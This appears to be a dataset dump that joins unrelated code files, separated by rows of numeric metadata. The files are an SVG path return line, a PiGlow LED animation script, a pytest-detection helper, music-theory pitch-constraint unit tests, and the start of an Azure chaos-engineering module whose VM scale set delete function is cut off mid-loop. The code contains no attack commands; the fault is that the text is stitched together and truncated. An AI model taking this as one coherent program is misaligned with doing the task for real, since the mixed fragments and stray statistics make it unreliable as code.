return '<path d="M69.763,46.758L69.763,46.758c1.368,1.949,2.179,4.318,2.179,6.883 c0,6.625-5.371,11.998-11.998,11.998c-2.775,0-12.801,0-15.998,0c-8.836,0-15.998-7.162-15.998-15.998s7.162-15.998,15.998-15.998 c2.002,0,3.914,0.375,5.68,1.047l0,0c1.635-4.682,6.078-8.047,11.318-8.047c0.755,0,1.491,0.078,2.207,0.212 c-0.131,0.575-0.207,1.173-0.207,1.788c0,4.418,3.581,7.999,7.998,7.999c0.616,0,1.213-0.076,1.789-0.208 c0.133,0.717,0.211,1.453,0.211,2.208C72.941,41.775,71.73,44.621,69.763,46.758z M31.947,49.641 c0,6.627,5.371,11.998,11.998,11.998c3.616,0,12.979,0,15.998,0c4.418,0,7.999-3.582,7.999-7.998c0-4.418-3.581-8-7.999-8 c-1.6,0-3.083,0.482-4.334,1.291c-1.231-5.316-5.973-9.29-11.664-9.29C37.318,37.642,31.947,43.014,31.947,49.641z M51.496,35.545 c0.001,0,0.002,0,0.002,0S51.497,35.545,51.496,35.545z M59.155,30.85c-2.9,0.664-5.175,2.91-5.925,5.775l0,0 c1.918,1.372,3.523,3.152,4.68,5.22c0.664-0.113,1.337-0.205,2.033-0.205c2.618,0,5.033,0.85,7.005,2.271l0,0 c0.858-0.979,1.485-2.168,1.786-3.482C63.881,39.525,60.059,35.706,59.155,30.85z" />'
| 239.477273
| 2,238
| 0.684255
| 2,870
| 10,537
| 2.512195
| 0.256446
| 0.007767
| 0.010402
| 0.008322
| 0.260055
| 0.242164
| 0.19681
| 0.16699
| 0.140361
| 0.100416
| 0
| 0.64154
| 0.058271
| 10,537
| 43
| 2,239
| 245.046512
| 0.085055
| 0.028281
| 0
| 0
| 0
| 0.454545
| 0.964813
| 0.527417
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 11
|
7a833c651fbedbfc36572f003b67f71b82243996
| 11,809
|
py
|
Python
|
Programs/slithering_snakes.py
|
ShineTop/PiGlow
|
3b87aca3a36a9cc2076ccebdccc5eb7a61855aa7
|
[
"MIT"
] | 5
|
2018-03-16T19:09:50.000Z
|
2022-02-06T21:37:35.000Z
|
Programs/slithering_snakes.py
|
Breakfast-for-Pigeons/PiGlow
|
3b87aca3a36a9cc2076ccebdccc5eb7a61855aa7
|
[
"MIT"
] | 3
|
2018-10-02T16:06:19.000Z
|
2020-03-01T19:07:31.000Z
|
Programs/slithering_snakes.py
|
ShineTop/PiGlow
|
3b87aca3a36a9cc2076ccebdccc5eb7a61855aa7
|
[
"MIT"
] | 1
|
2017-11-03T13:36:35.000Z
|
2017-11-03T13:36:35.000Z
|
#!/usr/bin/env python3
"""
Slithering Snakes
I think the title is self explanatory.
....................
Functions:
- slithering_snake_12: Lights up then turns off the LEDs on arms 1 and 2
- slithering_snake_13: Lights up then turns off the LEDs on arms 1 and 3
- slithering_snake_21: Lights up then turns off the LEDs on arms 2 and 1
- slithering_snake_23: Lights up then turns off the LEDs on arms 2 and 3
- slithering_snake_31: Lights up then turns off the LEDs on arms 3 and 1
- slithering_snake_32: Lights up then turns off the LEDs on arms 3 and 2
....................
Requirements:
PyGlow.py (many thanks to benleb for this program)
bfp_piglow_modules.py
You will have these files if you downloaded the entire repository.
....................
Author: Paul Ryan
This program was written on a Raspberry Pi using the Geany IDE.
"""
########################################################################
# Import modules #
########################################################################
import logging
from time import sleep
from PyGlow import PyGlow
from bfp_piglow_modules import print_header
from bfp_piglow_modules import check_log_directory
from bfp_piglow_modules import delete_empty_logs
from bfp_piglow_modules import stop
########################################################################
# Initialize #
########################################################################
PYGLOW = PyGlow()
PYGLOW.all(0)
########################################################################
# Functions #
########################################################################
def slithering_snake_12():
"""
Lights up then turns off the LEDs on arms 1 and 2
"""
LOGGER.debug("Slithering Snake 1-2")
sleep_speed = 0.10
# Light up Snake 12
PYGLOW.led(1, 100)
sleep(sleep_speed)
PYGLOW.led(2, 100)
sleep(sleep_speed)
PYGLOW.led(3, 100)
sleep(sleep_speed)
PYGLOW.led(4, 100)
sleep(sleep_speed)
PYGLOW.led(5, 100)
sleep(sleep_speed)
PYGLOW.led(6, 100)
sleep(sleep_speed)
PYGLOW.led(18, 100)
sleep(sleep_speed)
PYGLOW.led(11, 100)
sleep(sleep_speed)
PYGLOW.led(10, 100)
sleep(sleep_speed)
PYGLOW.led(9, 100)
sleep(sleep_speed)
PYGLOW.led(8, 100)
sleep(sleep_speed)
PYGLOW.led(7, 100)
sleep(sleep_speed)
# Turn off Snake 12
PYGLOW.led(1, 0)
sleep(sleep_speed)
PYGLOW.led(2, 0)
sleep(sleep_speed)
PYGLOW.led(3, 0)
sleep(sleep_speed)
PYGLOW.led(4, 0)
sleep(sleep_speed)
PYGLOW.led(5, 0)
sleep(sleep_speed)
PYGLOW.led(6, 0)
sleep(sleep_speed)
PYGLOW.led(18, 0)
sleep(sleep_speed)
PYGLOW.led(11, 0)
sleep(sleep_speed)
PYGLOW.led(10, 0)
sleep(sleep_speed)
PYGLOW.led(9, 0)
sleep(sleep_speed)
PYGLOW.led(8, 0)
sleep(sleep_speed)
PYGLOW.led(7, 0)
sleep(sleep_speed)
# Pause before next snake
sleep(1)
def slithering_snake_13():
"""
Lights up then turns off the LEDs on arms 1 and 3
"""
LOGGER.debug("Slithering Snake 1-3")
sleep_speed = 0.10
# Light up Snake 13
PYGLOW.led(1, 100)
sleep(sleep_speed)
PYGLOW.led(2, 100)
sleep(sleep_speed)
PYGLOW.led(3, 100)
sleep(sleep_speed)
PYGLOW.led(4, 100)
sleep(sleep_speed)
PYGLOW.led(5, 100)
sleep(sleep_speed)
PYGLOW.led(12, 100)
sleep(sleep_speed)
PYGLOW.led(18, 100)
sleep(sleep_speed)
PYGLOW.led(17, 100)
sleep(sleep_speed)
PYGLOW.led(16, 100)
sleep(sleep_speed)
PYGLOW.led(15, 100)
sleep(sleep_speed)
PYGLOW.led(14, 100)
sleep(sleep_speed)
PYGLOW.led(13, 100)
sleep(sleep_speed)
# Turn off Snake 13
PYGLOW.led(1, 0)
sleep(sleep_speed)
PYGLOW.led(2, 0)
sleep(sleep_speed)
PYGLOW.led(3, 0)
sleep(sleep_speed)
PYGLOW.led(4, 0)
sleep(sleep_speed)
PYGLOW.led(5, 0)
sleep(sleep_speed)
PYGLOW.led(12, 0)
sleep(sleep_speed)
PYGLOW.led(18, 0)
sleep(sleep_speed)
PYGLOW.led(17, 0)
sleep(sleep_speed)
PYGLOW.led(16, 0)
sleep(sleep_speed)
PYGLOW.led(15, 0)
sleep(sleep_speed)
PYGLOW.led(14, 0)
sleep(sleep_speed)
PYGLOW.led(13, 0)
sleep(sleep_speed)
# Pause before next snake
sleep(1)
def slithering_snake_21():
"""
Lights up then turns off the LEDs on arms 2 and 1
"""
LOGGER.debug("Slithering Snake 2-1")
sleep_speed = 0.10
# Light up Snake 21
PYGLOW.led(7, 100)
sleep(sleep_speed)
PYGLOW.led(8, 100)
sleep(sleep_speed)
PYGLOW.led(9, 100)
sleep(sleep_speed)
PYGLOW.led(10, 100)
sleep(sleep_speed)
PYGLOW.led(11, 100)
sleep(sleep_speed)
PYGLOW.led(18, 100)
sleep(sleep_speed)
PYGLOW.led(6, 100)
sleep(sleep_speed)
PYGLOW.led(5, 100)
sleep(sleep_speed)
PYGLOW.led(4, 100)
sleep(sleep_speed)
PYGLOW.led(3, 100)
sleep(sleep_speed)
PYGLOW.led(2, 100)
sleep(sleep_speed)
PYGLOW.led(1, 100)
sleep(sleep_speed)
# Turn off Snake 21
PYGLOW.led(7, 0)
sleep(sleep_speed)
PYGLOW.led(8, 0)
sleep(sleep_speed)
PYGLOW.led(9, 0)
sleep(sleep_speed)
PYGLOW.led(10, 0)
sleep(sleep_speed)
PYGLOW.led(11, 0)
sleep(sleep_speed)
PYGLOW.led(18, 0)
sleep(sleep_speed)
PYGLOW.led(6, 0)
sleep(sleep_speed)
PYGLOW.led(5, 0)
sleep(sleep_speed)
PYGLOW.led(4, 0)
sleep(sleep_speed)
PYGLOW.led(3, 0)
sleep(sleep_speed)
PYGLOW.led(2, 0)
sleep(sleep_speed)
PYGLOW.led(1, 0)
sleep(sleep_speed)
# Pause before next snake
sleep(1)
def slithering_snake_23():
"""
Lights up then turns off the LEDs on arms 2 and 3
"""
LOGGER.debug("Slithering Snake 2-3")
sleep_speed = 0.10
# Light up Snake 23
PYGLOW.led(7, 100)
sleep(sleep_speed)
PYGLOW.led(8, 100)
sleep(sleep_speed)
PYGLOW.led(9, 100)
sleep(sleep_speed)
PYGLOW.led(10, 100)
sleep(sleep_speed)
PYGLOW.led(11, 100)
sleep(sleep_speed)
PYGLOW.led(12, 100)
sleep(sleep_speed)
PYGLOW.led(6, 100)
sleep(sleep_speed)
PYGLOW.led(17, 100)
sleep(sleep_speed)
PYGLOW.led(16, 100)
sleep(sleep_speed)
PYGLOW.led(15, 100)
sleep(sleep_speed)
PYGLOW.led(14, 100)
sleep(sleep_speed)
PYGLOW.led(13, 100)
sleep(sleep_speed)
# Turn off Snake 23
PYGLOW.led(7, 0)
sleep(sleep_speed)
PYGLOW.led(8, 0)
sleep(sleep_speed)
PYGLOW.led(9, 0)
sleep(sleep_speed)
PYGLOW.led(10, 0)
sleep(sleep_speed)
PYGLOW.led(11, 0)
sleep(sleep_speed)
PYGLOW.led(12, 0)
sleep(sleep_speed)
PYGLOW.led(6, 0)
sleep(sleep_speed)
PYGLOW.led(17, 0)
sleep(sleep_speed)
PYGLOW.led(16, 0)
sleep(sleep_speed)
PYGLOW.led(15, 0)
sleep(sleep_speed)
PYGLOW.led(14, 0)
sleep(sleep_speed)
PYGLOW.led(13, 0)
sleep(sleep_speed)
# Pause before next snake
sleep(1)
def slithering_snake_31():
"""
Lights up then turns off the LEDs on arms 3 and 1
"""
LOGGER.debug("Slithering Snake 3-1")
sleep_speed = 0.10
# Light up Snake 31
PYGLOW.led(13, 100)
sleep(sleep_speed)
PYGLOW.led(14, 100)
sleep(sleep_speed)
PYGLOW.led(15, 100)
sleep(sleep_speed)
PYGLOW.led(16, 100)
sleep(sleep_speed)
PYGLOW.led(17, 100)
sleep(sleep_speed)
PYGLOW.led(18, 100)
sleep(sleep_speed)
PYGLOW.led(12, 100)
sleep(sleep_speed)
PYGLOW.led(5, 100)
sleep(sleep_speed)
PYGLOW.led(4, 100)
sleep(sleep_speed)
PYGLOW.led(3, 100)
sleep(sleep_speed)
PYGLOW.led(2, 100)
sleep(sleep_speed)
PYGLOW.led(1, 100)
sleep(sleep_speed)
# Turn off Snake 31
PYGLOW.led(13, 0)
sleep(sleep_speed)
PYGLOW.led(14, 0)
sleep(sleep_speed)
PYGLOW.led(15, 0)
sleep(sleep_speed)
PYGLOW.led(16, 0)
sleep(sleep_speed)
PYGLOW.led(17, 0)
sleep(sleep_speed)
PYGLOW.led(18, 0)
sleep(sleep_speed)
PYGLOW.led(12, 0)
sleep(sleep_speed)
PYGLOW.led(5, 0)
sleep(sleep_speed)
PYGLOW.led(4, 0)
sleep(sleep_speed)
PYGLOW.led(3, 0)
sleep(sleep_speed)
PYGLOW.led(2, 0)
sleep(sleep_speed)
PYGLOW.led(1, 0)
sleep(sleep_speed)
# Pause before next snake
sleep(1)
def slithering_snake_32():
"""
Lights up then turns off the LEDs on arms 3 and 2
"""
LOGGER.debug("Slithering Snake 3-2")
sleep_speed = 0.10
# Light up Snake 32
PYGLOW.led(13, 100)
sleep(sleep_speed)
PYGLOW.led(14, 100)
sleep(sleep_speed)
PYGLOW.led(15, 100)
sleep(sleep_speed)
PYGLOW.led(16, 100)
sleep(sleep_speed)
PYGLOW.led(17, 100)
sleep(sleep_speed)
PYGLOW.led(6, 100)
sleep(sleep_speed)
PYGLOW.led(12, 100)
sleep(sleep_speed)
PYGLOW.led(11, 100)
sleep(sleep_speed)
PYGLOW.led(10, 100)
sleep(sleep_speed)
PYGLOW.led(9, 100)
sleep(sleep_speed)
PYGLOW.led(8, 100)
sleep(sleep_speed)
PYGLOW.led(7, 100)
sleep(sleep_speed)
# Turn off Snake 32
PYGLOW.led(13, 0)
sleep(sleep_speed)
PYGLOW.led(14, 0)
sleep(sleep_speed)
PYGLOW.led(15, 0)
sleep(sleep_speed)
PYGLOW.led(16, 0)
sleep(sleep_speed)
PYGLOW.led(17, 0)
sleep(sleep_speed)
PYGLOW.led(6, 0)
sleep(sleep_speed)
PYGLOW.led(12, 0)
sleep(sleep_speed)
PYGLOW.led(11, 0)
sleep(sleep_speed)
PYGLOW.led(10, 0)
sleep(sleep_speed)
PYGLOW.led(9, 0)
sleep(sleep_speed)
PYGLOW.led(8, 0)
sleep(sleep_speed)
PYGLOW.led(7, 0)
sleep(sleep_speed)
# Pause before next snake
sleep(1)
def main():
"""
The main function
"""
LOGGER.debug("START")
# Snakes 12, 13, 21, 23, 31, 32
slithering_snake_12()
slithering_snake_13()
slithering_snake_21()
slithering_snake_23()
slithering_snake_31()
slithering_snake_32()
# Snakes 12, 23, 31, 13, 32, 21
slithering_snake_12()
slithering_snake_23()
slithering_snake_31()
slithering_snake_13()
slithering_snake_32()
slithering_snake_21()
# Snakes 13, 12, 23, 21, 31, 32
slithering_snake_13()
slithering_snake_12()
slithering_snake_23()
slithering_snake_21()
slithering_snake_31()
slithering_snake_32()
# Snakes 13, 32, 21, 12, 23, 31
slithering_snake_13()
slithering_snake_32()
slithering_snake_21()
slithering_snake_12()
slithering_snake_23()
slithering_snake_31()
LOGGER.debug("END")
delete_empty_logs(LOG)
stop()
if __name__ == '__main__':
try:
# STEP01: Check if Log directory exists.
check_log_directory()
# STEP02: Enable logging
LOG = 'Logs/slithering_snakes.log'
LOG_FORMAT = '%(asctime)s %(name)s: %(funcName)s: \
%(levelname)s: %(message)s'
LOGGER = logging.getLogger(__name__)
# Nothing will log unless logging level is changed to DEBUG
LOGGER.setLevel(logging.ERROR)
FORMATTER = logging.Formatter(fmt=LOG_FORMAT,
datefmt='%m/%d/%y %I:%M:%S %p:')
FILE_HANDLER = logging.FileHandler(LOG, 'w')
FILE_HANDLER.setFormatter(FORMATTER)
LOGGER.addHandler(FILE_HANDLER)
# STEP03: Print header
print_header()
# STEP04: Print instructions in white text
print("\033[1;37;40mPress Ctrl-C to stop the program.")
# STEP05: Run the main function
main()
except KeyboardInterrupt:
delete_empty_logs(LOG)
stop()
| 23.856566
| 72
| 0.602761
| 1,670
| 11,809
| 4.105389
| 0.094611
| 0.218786
| 0.315053
| 0.404317
| 0.843057
| 0.806884
| 0.784131
| 0.77713
| 0.740082
| 0.740082
| 0
| 0.082223
| 0.250233
| 11,809
| 494
| 73
| 23.904858
| 0.692117
| 0.174697
| 0
| 0.888889
| 0
| 0
| 0.025093
| 0.002837
| 0
| 0
| 0
| 0
| 0
| 1
| 0.01897
| false
| 0
| 0.01897
| 0
| 0.03794
| 0.00813
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
7aa9f1ea0f1585e054f15a33ac6e5bd0c1252ce1
| 222
|
py
|
Python
|
node/core/utils/pytest.py
|
thenewboston-developers/Node
|
e71a405f4867786a54dd17ddd97595dd3a630018
|
[
"MIT"
] | 18
|
2021-11-30T04:02:13.000Z
|
2022-03-24T12:33:57.000Z
|
node/core/utils/pytest.py
|
thenewboston-developers/Node
|
e71a405f4867786a54dd17ddd97595dd3a630018
|
[
"MIT"
] | 1
|
2022-02-04T17:07:38.000Z
|
2022-02-04T17:07:38.000Z
|
node/core/utils/pytest.py
|
thenewboston-developers/Node
|
e71a405f4867786a54dd17ddd97595dd3a630018
|
[
"MIT"
] | 5
|
2022-01-31T05:28:13.000Z
|
2022-03-08T17:25:31.000Z
|
import os
import sys
def is_pytest_running():
# TODO(dmu) MEDIUM: Implement a better way of detecting pytest
return os.getenv('PYTEST_RUNNING') == 'true' or os.path.basename(sys.argv[0]) in ('pytest', 'py.test')
| 27.75
| 106
| 0.702703
| 35
| 222
| 4.371429
| 0.771429
| 0.169935
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005348
| 0.157658
| 222
| 7
| 107
| 31.714286
| 0.812834
| 0.27027
| 0
| 0
| 0
| 0
| 0.19375
| 0
| 0
| 0
| 0
| 0.142857
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0.25
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
8fe9542deec2e59a607f26732d427fb6109ce50f
| 11,877
|
py
|
Python
|
tests/melody_tests/constraints_tests/test_comparative_pitch_constraint.py
|
dpazel/music_rep
|
2f9de9b98b13df98f1a0a2120b84714725ce527e
|
[
"MIT"
] | 1
|
2021-05-06T19:45:54.000Z
|
2021-05-06T19:45:54.000Z
|
tests/melody_tests/constraints_tests/test_comparative_pitch_constraint.py
|
dpazel/music_rep
|
2f9de9b98b13df98f1a0a2120b84714725ce527e
|
[
"MIT"
] | null | null | null |
tests/melody_tests/constraints_tests/test_comparative_pitch_constraint.py
|
dpazel/music_rep
|
2f9de9b98b13df98f1a0a2120b84714725ce527e
|
[
"MIT"
] | null | null | null |
import unittest
from tonalmodel.tonality import Tonality
from harmoniccontext.harmonic_context import HarmonicContext
from melody.constraints.policy_context import PolicyContext
from melody.constraints.contextual_note import ContextualNote
from tonalmodel.modality import ModalityType
from tonalmodel.diatonic_tone import DiatonicTone
from harmonicmodel.tertian_chord_template import TertianChordTemplate
from timemodel.duration import Duration
from tonalmodel.diatonic_pitch import DiatonicPitch
from tonalmodel.pitch_range import PitchRange
from structure.note import Note
from melody.constraints.comparative_pitch_constraint import ComparativePitchConstraint
from operator import attrgetter
import logging
import sys
class TestComparativePitchConstraint(unittest.TestCase):
# Note: add -s --nologcapture to 'additional arguments in configuration to see logging
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
def test_basic_policy(self):
logging.debug('Start test_basic_policy')
lower_policy_context = TestComparativePitchConstraint.policy_creator(ModalityType.Major, DiatonicTone('G'), 'tV',
'C:4', 'C:6')
upper_note_1 = Note(DiatonicPitch.parse('C:5'), Duration(1, 8))
upper_note_2 = Note(DiatonicPitch.parse('D:5'), Duration(1, 8))
lower_note_1 = ContextualNote(lower_policy_context, Note(DiatonicPitch.parse('F#:5'), Duration(1, 8)))
lower_note_2 = ContextualNote(lower_policy_context)
p_map = dict([(upper_note_1, lower_note_1),
(upper_note_2, lower_note_2)])
policy = ComparativePitchConstraint(upper_note_1, upper_note_2,
ComparativePitchConstraint.LESS_THAN)
result = policy.values(p_map, upper_note_2)
pitches = sorted([note.diatonic_pitch for note in result])
for pitch in pitches:
logging.debug(pitch)
# validate
assert DiatonicPitch.parse('F#:5') not in pitches
assert len(pitches) == 4
for pitch in pitches:
assert pitch.chromatic_distance > DiatonicPitch.parse('F#:5').chromatic_distance, \
"{0} <= {1}".format(pitch, DiatonicPitch.parse('F#:5'))
for note in result:
lower_note_2.note = note
assert policy.verify(p_map) is True
lower_note_2.note = None
# Do less than
logging.debug('------')
policy = ComparativePitchConstraint(upper_note_1, upper_note_2,
ComparativePitchConstraint.GREATER_THAN)
result = policy.values(p_map, upper_note_2)
pitches = sorted([note.diatonic_pitch for note in result])
for pitch in pitches:
logging.debug(pitch)
assert DiatonicPitch.parse('F#:5') not in pitches
assert len(pitches) == 10
for pitch in pitches:
assert pitch.chromatic_distance < DiatonicPitch.parse('F#:5').chromatic_distance, \
"{0} >= {1}".format(pitch, DiatonicPitch.parse('F#:5'))
for note in result:
lower_note_2.note = note
assert policy.verify(p_map) is True
lower_note_2.note = None
# Do greater than or equal
logging.debug('------')
policy = ComparativePitchConstraint(upper_note_1, upper_note_2,
ComparativePitchConstraint.LESS_EQUAL)
result = policy.values(p_map, upper_note_2)
pitches = sorted([note.diatonic_pitch for note in result])
for pitch in pitches:
logging.debug(pitch)
assert DiatonicPitch.parse('F#:5') in pitches
assert len(pitches) == 5
for pitch in pitches:
assert pitch.chromatic_distance >= DiatonicPitch.parse('F#:5').chromatic_distance, \
"{0} < {1}".format(pitch, DiatonicPitch.parse('F#:5'))
for note in result:
lower_note_2.note = note
assert policy.verify(p_map) is True
lower_note_2.note = None
# Do less than or equal
logging.debug('------')
policy = ComparativePitchConstraint(upper_note_1, upper_note_2,
ComparativePitchConstraint.GREATER_EQUAL)
result = policy.values(p_map, upper_note_2)
pitches = sorted([note.diatonic_pitch for note in result])
for pitch in pitches:
logging.debug(pitch)
assert DiatonicPitch.parse('F#:5') in pitches
assert len(pitches) == 11
for pitch in pitches:
assert pitch.chromatic_distance <= DiatonicPitch.parse('F#:5').chromatic_distance, \
"{0} > {1}".format(pitch, DiatonicPitch.parse('F#:5'))
for note in result:
lower_note_2.note = note
assert policy.verify(p_map) is True
lower_note_2.note = None
# Do equal
logging.debug('------')
policy = ComparativePitchConstraint(upper_note_1, upper_note_2,
ComparativePitchConstraint.EQUAL)
result = policy.values(p_map, upper_note_2)
pitches = sorted([note.diatonic_pitch for note in result])
for pitch in pitches:
logging.debug(pitch)
assert DiatonicPitch.parse('F#:5') in pitches
assert len(pitches) == 1
for pitch in pitches:
assert pitch.chromatic_distance == DiatonicPitch.parse('F#:5').chromatic_distance, \
"{0} != {1}".format(pitch, DiatonicPitch.parse('F#:5'))
for note in result:
lower_note_2.note = note
assert policy.verify(p_map) is True
lower_note_2.note = None
logging.debug('End test_basic_policy')
def test_comparative_reversal(self):
logging.debug('Start test_comparative_reversal')
upper_policy_context = TestComparativePitchConstraint.policy_creator(ModalityType.Major, DiatonicTone('Ab'), 'tIV',
'C:4', 'C:6')
lower_policy_context = TestComparativePitchConstraint.policy_creator(ModalityType.Major, DiatonicTone('G'), 'tV',
'C:4', 'C:6')
upper_note_1 = Note(DiatonicPitch.parse('C:5'), Duration(1, 8))
upper_note_2 = Note(DiatonicPitch.parse('D:5'), Duration(1, 8))
lower_note_1 = ContextualNote(lower_policy_context)
lower_note_2 = ContextualNote(lower_policy_context, Note(DiatonicPitch.parse('F#:5'), Duration(1, 8)))
p_map = dict([(upper_note_1, lower_note_1),
(upper_note_2, lower_note_2)])
policy = ComparativePitchConstraint(upper_note_1, upper_note_2,
ComparativePitchConstraint.LESS_THAN)
result = policy.values(p_map, upper_note_1)
pitches = sorted([note.diatonic_pitch for note in result], key=attrgetter('chromatic_distance'))
for pitch in pitches:
logging.debug(pitch)
# validate
assert DiatonicPitch.parse('F#:5') not in pitches
assert len(pitches) == 10
for pitch in pitches:
assert pitch.chromatic_distance < DiatonicPitch.parse('F#:5').chromatic_distance, \
"{0} => {1}".format(pitch, DiatonicPitch.parse('F#:5'))
for note in result:
lower_note_1.note = note
assert policy.verify(p_map) is True
lower_note_1.note = None
# Test Less than
logging.debug('------')
policy = ComparativePitchConstraint(upper_note_1, upper_note_2,
ComparativePitchConstraint.GREATER_THAN)
result = policy.values(p_map, upper_note_1)
pitches = sorted([note.diatonic_pitch for note in result], key=attrgetter('chromatic_distance'))
for pitch in pitches:
logging.debug(pitch)
# validate
assert DiatonicPitch.parse('F#:5') not in pitches
assert len(pitches) == 4
for pitch in pitches:
assert pitch.chromatic_distance > DiatonicPitch.parse('F#:5').chromatic_distance, \
"{0} <= {1}".format(pitch, DiatonicPitch.parse('F#:5'))
for note in result:
lower_note_1.note = note
assert policy.verify(p_map) is True
lower_note_1.note = None
# Test greater than or equal
logging.debug('------')
policy = ComparativePitchConstraint(upper_note_1, upper_note_2,
ComparativePitchConstraint.LESS_EQUAL)
result = policy.values(p_map, upper_note_1)
pitches = sorted([note.diatonic_pitch for note in result], key=attrgetter('chromatic_distance'))
for pitch in pitches:
logging.debug(pitch)
# validate
assert DiatonicPitch.parse('F#:5') in pitches
assert len(pitches) == 11
for pitch in pitches:
assert pitch.chromatic_distance <= DiatonicPitch.parse('F#:5').chromatic_distance, \
"{0} > {1}".format(pitch, DiatonicPitch.parse('F#:5'))
for note in result:
lower_note_1.note = note
assert policy.verify(p_map) is True
lower_note_1.note = None
# Test less than or equal
logging.debug('------')
policy = ComparativePitchConstraint(upper_note_1, upper_note_2,
ComparativePitchConstraint.GREATER_EQUAL)
result = policy.values(p_map, upper_note_1)
pitches = sorted([note.diatonic_pitch for note in result], key=attrgetter('chromatic_distance'))
for pitch in pitches:
logging.debug(pitch)
# validate
assert DiatonicPitch.parse('F#:5') in pitches
assert len(pitches) == 5
for pitch in pitches:
assert pitch.chromatic_distance >= DiatonicPitch.parse('F#:5').chromatic_distance, \
"{0} < {1}".format(pitch, DiatonicPitch.parse('F#:5'))
for note in result:
lower_note_1.note = note
assert policy.verify(p_map) is True
lower_note_1.note = None
# Test equal
logging.debug('------')
policy = ComparativePitchConstraint(upper_note_1, upper_note_2,
ComparativePitchConstraint.EQUAL)
result = policy.values(p_map, upper_note_1)
pitches = sorted([note.diatonic_pitch for note in result], key=attrgetter('chromatic_distance'))
for pitch in pitches:
logging.debug(pitch)
# validate
assert DiatonicPitch.parse('F#:5') in pitches
assert len(pitches) == 1
for pitch in pitches:
assert pitch.chromatic_distance == DiatonicPitch.parse('F#:5').chromatic_distance, \
"{0} != {1}".format(pitch, DiatonicPitch.parse('F#:5'))
for note in result:
lower_note_1.note = note
assert policy.verify(p_map) is True
lower_note_1.note = None
logging.debug('End test_comparative_reversal')
@staticmethod
def policy_creator(modality_type, modality_tone, tertian_chord_txt, low_pitch_txt, hi_pitch_txt):
diatonic_tonality = Tonality.create(modality_type, modality_tone)
chord = TertianChordTemplate.parse(tertian_chord_txt).create_chord(diatonic_tonality)
hc = HarmonicContext(diatonic_tonality, chord, Duration(1, 2))
pitch_range = PitchRange(DiatonicPitch.parse(low_pitch_txt).chromatic_distance,
DiatonicPitch.parse(hi_pitch_txt).chromatic_distance)
return PolicyContext(hc, pitch_range)
if __name__ == "__main__":
unittest.main()
| 41.096886
| 123
| 0.619685
| 1,338
| 11,877
| 5.299701
| 0.090433
| 0.04823
| 0.085742
| 0.090255
| 0.809618
| 0.802567
| 0.797208
| 0.789874
| 0.777887
| 0.777887
| 0
| 0.018346
| 0.284078
| 11,877
| 288
| 124
| 41.239583
| 0.815595
| 0.023912
| 0
| 0.804762
| 0
| 0
| 0.044485
| 0.004319
| 0
| 0
| 0
| 0
| 0.190476
| 1
| 0.014286
| false
| 0
| 0.07619
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8f29d692eb07a6ba8a3b1312fc01cd356a1bdcfa
| 20,165
|
py
|
Python
|
pdchaosazure/vmss/actions.py
|
proofdock/chaos-azure
|
85302f8be18153862656c587988eafb5dd37ddf7
|
[
"Apache-2.0"
] | 1
|
2021-04-24T20:01:54.000Z
|
2021-04-24T20:01:54.000Z
|
pdchaosazure/vmss/actions.py
|
proofdock/chaos-azure
|
85302f8be18153862656c587988eafb5dd37ddf7
|
[
"Apache-2.0"
] | 23
|
2020-05-22T06:43:14.000Z
|
2021-02-25T21:02:28.000Z
|
pdchaosazure/vmss/actions.py
|
proofdock/chaos-azure
|
85302f8be18153862656c587988eafb5dd37ddf7
|
[
"Apache-2.0"
] | null | null | null |
import concurrent.futures
from typing import Iterable, Mapping
from azure.core.exceptions import HttpResponseError
from chaoslib import Configuration, Secrets
from chaoslib.exceptions import FailedActivity
from logzero import logger
from pdchaosazure.common import cleanse, config
from pdchaosazure.common.compute import command, client
from pdchaosazure.vmss.fetcher import fetch_vmss, fetch_instances
from pdchaosazure.vmss.records import Records
__all__ = [
"burn_io", "deallocate", "delete", "fill_disk", "network_latency",
"restart", "stop", "stress_cpu"
]
def delete(vmss_filter: str = None,
instance_filter: str = None,
configuration: Configuration = None,
secrets: Secrets = None):
"""Delete instances from the VMSS.
**Be aware**: Deleting a VMSS instance is an invasive action.
You will not be able to recover the VMSS instance once you deleted it.
Parameters
----------
vmss_filter : str, optional
Filter the virtual machine scale set(s). If omitted a random VMSS from your subscription is selected.
instance_filter : str, optional
KQLL: Filter the instances of the selected virtual machine scale set(s). If omitted
a random instance from your VMSS is selected.
"""
logger.debug(
"Starting {}: configuration='{}', filter='{}'".format(delete.__name__, configuration, vmss_filter))
clnt = client.init()
vmss_list = fetch_vmss(vmss_filter, configuration, secrets)
vmss_records = Records()
for vmss in vmss_list:
instances_records = Records()
instances = fetch_instances(vmss, instance_filter, clnt)
futures = []
with concurrent.futures.ThreadPoolExecutor(max_workers=len(instances)) as executor:
for instance in instances:
try:
poller = clnt.virtual_machine_scale_set_vms.begin_delete(
vmss['resourceGroup'], vmss['name'], instance['instance_id'])
except HttpResponseError as e:
raise FailedActivity(e.message)
# collect future results
futures.append(
executor.submit(__long_poll, delete.__name__, instance, poller, configuration))
# wait for results
for future in concurrent.futures.as_completed(futures):
